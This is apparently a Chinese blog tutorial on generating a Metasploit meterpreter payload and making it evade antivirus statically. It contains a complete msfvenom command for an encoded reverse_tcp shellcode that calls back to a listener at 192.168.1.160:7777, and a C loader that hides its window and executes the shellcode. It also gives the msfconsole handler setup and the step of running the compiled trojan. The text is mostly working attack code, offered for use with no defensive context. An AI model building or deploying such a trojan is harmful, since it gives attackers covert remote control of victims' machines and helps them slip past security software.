MSF生成meterpreter及静态免杀

1.静态免杀

1.1编译c文件,静态免杀

1.1.1 生成shellcode

在kali命令行输入

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '/x00' lhost=192.168.1.160 lport=7777 -f c -o /home/shell/test01.c

-p 选择payload
-e 选择使用的编码
-i 给payload编码的次数
-b 避免出现的字符
-f 输出文件类型
-o 输出文件目录
这里写图片描述

1.1.2 对shellcode手工编译免杀

#include<stdio.h>
#include<windows.h>
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")

unsigned char buf[] = 这里添加shellcode;


main()
{
__asm   
    {   
        lea eax,buf;   
        call eax;   
    }   
}

改好shellcode后用c编译器编译

1.1.3开启监听

在kali上使用msf监听
在kali命令行输入

msfconsole
use exploit/multi/handler
set lhost 192.168.1.160
set lport 7777
set payload windows/meterpreter/reverse_tcp
exploit

这里写图片描述

1.1.4触发木马

运行编译好的exe文件
这里写图片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章